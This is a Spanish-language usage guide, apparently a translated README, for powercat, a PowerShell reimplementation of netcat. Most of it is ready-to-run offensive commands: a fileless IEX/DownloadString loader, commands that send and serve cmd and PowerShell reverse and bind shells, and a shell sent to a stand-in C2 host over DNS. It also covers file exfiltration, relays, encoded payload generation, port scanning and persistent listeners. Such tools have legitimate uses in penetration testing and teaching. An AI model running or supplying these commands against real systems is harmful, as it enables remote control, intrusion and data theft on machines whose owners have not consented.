
netshell incluye todas las características en PowerShell versión 2
Netcat: La versión de PowerShell. (Compatible con PowerShell versión 2 y posteriores)
powercat es una función de PowerShell. Primero debes cargar la función antes de poder ejecutarla. Puedes colocar uno de los siguientes comandos en tu perfil de PowerShell para que powercat se cargue automáticamente al iniciar PowerShell.
Load The Function From Downloaded .ps1 File:
. .\powercat.ps1
Load The Function From URL:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
-l Escuchar una conexión. [Switch]
-c Conectar a un listener. [String]
-p El puerto para conectar o escuchar. [String]
-e Ejecutar. (GAPING_SECURITY_HOLE) [String]
-ep Ejecutar PowerShell. [Switch]
-r Retransmitir. Formato: "-r tcp:10.1.1.1:443" [String]
-u Transferir datos por UDP. [Switch]
-dns Transferir datos por DNS (dnscat2). [String]
-dnsft Umbral de fallos DNS. [int32]
-t Opción de tiempo de espera. Valor predeterminado: 60 [int32]
-i Entrada: ruta de archivo (cadena), arreglo de bytes o cadena. [object]
-o Tipo de salida de consola: "Host", "Bytes" o "String" [String]
-of Ruta del archivo de salida. [String]
-d Desconectar después de conectar. [Switch]
-rep Repetidor. Reiniciar después de desconectar. [Switch]
-g Generar payload. [Switch]
-ge Generar payload codificado. [Switch]
-h Mostrar mensaje de ayuda. [Switch]
Por defecto, powercat lee la entrada desde la consola y escribe la salida en la consola usando write-host. Puedes cambiar el tipo de salida a 'Bytes' o 'String' con -o.
Basic Client:
powercat -c 10.1.1.1 -p 443
Basic Listener:
powercat -l -p 8000
Basic Client, Output as Bytes:
powercat -c 10.1.1.1 -p 443 -o Bytes
powercat se puede usar para transferir archivos en ambos sentidos usando -i (Input) y -of (Output File).
Send File:
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Recieve File:
powercat -l -p 8000 -of C:\inputfile
powercat se puede usar para enviar y servir shells. Especifica un ejecutable con -e, o usa -ep para ejecutar PowerShell.
Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Serve a shell which executes powershell commands:
powercat -l -p 443 -ep
powercat admite más que solo enviar datos por TCP. Especifica -u para habilitar el modo UDP. También se pueden enviar datos a un servidor dnscat2 con -dns. Asegúrate de agregar "-e open --no-cache" al ejecutar el servidor dnscat2.
Send Data Over UDP:
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1:
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows:
powercat -dns c2.example.com -e cmd
Los relés en powercat funcionan igual que los relés tradicionales de netcat, pero no necesitas crear un archivo ni iniciar un segundo proceso. También puedes retransmitir datos entre conexiones de diferentes protocolos.
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
TCP Listener to UDP Client Relay:
powercat -l -p 8000 -r udp:10.1.1.16:53
TCP Listener to DNS Client Relay
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
TCP Listener to DNS Client Relay using the Windows Default DNS Server
powercat -l -p 8000 -r dns:::c2.example.com
TCP Client to Client Relay
powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
TCP Listener to Listener Relay
powercat -l -p 8000 -r tcp:9000
Los payloads que realizan una acción específica se pueden generar usando -g (Generate Payload) y -ge (Generate Encoded Payload). Los payloads codificados se pueden ejecutar con powershell -E. Puedes usarlos si no deseas usar todo powercat.
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Generate a bind tcp encoded command which listens on port 8000:
powercat -l -p 8000 -e cmd -ge
powercat también se puede usar para realizar escaneos de puertos e iniciar servidores persistentes.
Basic TCP Port Scanner:
(21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep